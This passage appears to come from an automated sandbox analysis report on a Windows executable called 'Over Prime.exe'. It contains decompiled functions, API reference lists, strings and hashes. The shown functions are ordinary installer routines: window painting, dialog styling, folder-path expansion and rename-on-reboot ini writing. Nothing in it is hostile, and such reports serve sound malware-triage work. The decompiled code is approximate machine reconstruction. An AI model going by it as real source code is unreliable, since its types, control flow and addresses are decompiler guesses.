				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x51456a
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

0x0040466a
0x00404797
0x004047f4
0x004047f8
0x004048c5
0x004048c7
0x004048c7
0x004048cd
0x004048cd
0x004048d0
0x00000000
0x004048d7
0x00404806
0x0040480c
0x00404816
0x00404821
0x00404824
0x00404827
0x00404832
0x00404835
0x0040483c
0x00404849
0x0040485a
0x00404860
0x00404868
0x00404876
0x0040487c
0x0040487c
0x0040483c
0x00404886
0x00000000
0x00404891
0x00404895
0x004048a5
0x004048a5
0x004048ab
0x004048b7
0x004048b7
0x00000000
0x004048bb
0x00404886
0x004047a2
0x00000000
0x004047b4
0x004047b4
0x004047b9
0x004047b9
0x004047bf
0x00000000
0x00000000
0x004047e8
0x004047ea
0x004047ef
0x00000000
0x004047ef
0x004047a2
0x00404670
0x00404673
0x00404678
0x0040467a
0x00404689
0x00404689
0x00404691
0x00404694
0x00404698
0x0040469b
0x0040469f
0x004046a2
0x004046a5
0x004046a8
0x004046af
0x004046b1
0x004046b1
0x004046bb
0x004046c8
0x004046d2
0x004046d7
0x004046da
0x004046df
0x004046f6
0x004046fd
0x00404710
0x00404713
0x00404727
0x0040472e
0x00404733
0x00404738
0x00404738
0x00404746
0x00404754
0x00404766
0x0040476b
0x0040477b
0x0040477d
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

Call, xrefs: 00404835
N, xrefs: 004047F4
jEQ, xrefs: 0040467A

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$jEQ
API String ID: 3103080414-2529288162
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040657A Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				intOrPtr _t93;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t93 =  *0x433edc; // 0x51456a
					_t44 =  *(_t93 - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x0040657a
0x0040657a
0x0040657a
0x00406580
0x00406585
0x00406587
0x00406596
0x00406596
0x0040659e
0x0040659f
0x004065a0
0x004065a1
0x004065a4
0x004065ac
0x004065ae
0x004065bf
0x004065c2
0x004065c2
0x004065c6
0x004065cc
0x004065cf
0x004067aa
0x004067aa
0x004067b5
0x004067c1
0x004067c1
0x00000000
0x004065d5
0x004065da
0x004065ef
0x004065f0
0x004065f6
0x00406788
0x00406796
0x00406799
0x00406799
0x0040678a
0x0040678d
0x00406790
0x00406792
0x00406792
0x0040679b
0x0040679b
0x004067a1
0x004067a4
0x004065d7
0x00000000
0x004065d7
0x00000000
0x004067a4
0x004065fc
0x004065ff
0x0040660e
0x00406615
0x00406621
0x00406624
0x00406627
0x00406628
0x0040662d
0x00406633
0x00406636
0x00406639
0x0040672c
0x00406731
0x00406764
0x00406769
0x0040676e
0x00406773
0x00406773
0x00406778
0x0040677e
0x00406781
0x00000000
0x00406781
0x00406733
0x00406736
0x00406739
0x0040674e
0x00406755
0x0040673b
0x00406742
0x00406742
0x0040675d
0x00406760
0x00406724
0x00406725
0x00406725
0x00000000
0x00406760
0x00406646
0x0040664a
0x0040664a
0x0040664b
0x0040664d
0x0040668a
0x0040668d
0x0040669d
0x004066a0
0x004066a8
0x004066ae
0x004066ae
0x00406709
0x00406709
0x0040670b
0x00000000
0x00000000
0x004066b2
0x004066b7
0x004066b8
0x004066ba
0x004066d1
0x004066df
0x004066e5
0x004066e7
0x00406705
0x00406705
0x00406705
0x00000000
0x00406705
0x004066ed
0x004066f6
0x004066f9
0x004066ff
0x00406703
0x00000000
0x00000000
0x00000000
0x00406703
0x004066cb
0x004066cd
0x004066cf
0x00000000
0x00000000
0x00000000
0x004066cf
0x00000000
0x00406709
0x00406695
0x00000000
0x0040664f
0x0040666d
0x00406676
0x00406713
0x00406717
0x0040671f
0x0040671f
0x00000000
0x00406717
0x00406680
0x0040670d
0x00406711
0x00000000
0x00000000
0x00000000
0x00406711
0x0040664d
0x00000000
0x004065da

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00000000,00425A20,75B523A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000), ref: 00406779

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll, xrefs: 0040659F
Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
jEQ, xrefs: 00406587

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$jEQ
API String ID: 4260037668-3188126936
Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406183
0x0040618c
0x00406193
0x0040619d
0x004061b1
0x004061d9
0x004061e4
0x004061e8
0x00406208
0x0040620f
0x00406219
0x00406226
0x0040622b
0x00406230
0x00406234
0x00406243
0x00406245
0x00406252
0x00406256
0x004062f1
0x00000000
0x0040626c
0x00406279
0x0040629d
0x004062a1
0x004062c0
0x004062c4
0x004062c4
0x004062c6
0x004062cf
0x004062da
0x004062e5
0x004062eb
0x00000000
0x004062eb
0x004062a3
0x004062a6
0x004062b1
0x004062ad
0x004062af
0x004062b0
0x004062b0
0x004062b8
0x004062ba
0x00000000
0x004062ba
0x00406284
0x0040628a
0x00000000
0x0040628a
0x00406256
0x00406234
0x004061b3
0x004061be
0x004061c7
0x004061cb
0x00000000
0x00000000
0x004061cb
0x004062fc

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7

Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
wsprintfA.USER32 ref: 00406202
GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
GlobalFree.KERNEL32(00000000), ref: 004062EB
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Over Prime.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Strings

[Rename], xrefs: 0040626C, 0040627E
%ls=%ls, xrefs: 004061F8

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D

Uniqueness

Uniqueness Score: -1.00%

Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404512
0x004045c8
0x00000000
0x004045c8
0x00404523
0x00404527
0x00000000
0x00404541
0x00404541
0x0040454a
0x00000000
0x00000000
0x0040454c
0x00404558
0x0040455b
0x0040455b
0x00404561
0x00404567
0x00404567
0x00404573
0x00404579
0x00404580
0x00404583
0x00404586
0x00404588
0x00404588
0x00404590
0x00404596
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045b0
0x004045b0
0x004045c0
0x004045c0
0x00000000
0x004045c3

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040451D
GetSysColor.USER32(00000000), ref: 0040455B
SetTextColor.GDI32(?,00000000), ref: 00404567
SetBkMode.GDI32(?,?), ref: 00404573
GetSysColor.USER32(?), ref: 00404586
SetBkColor.GDI32(?,?), ref: 00404596
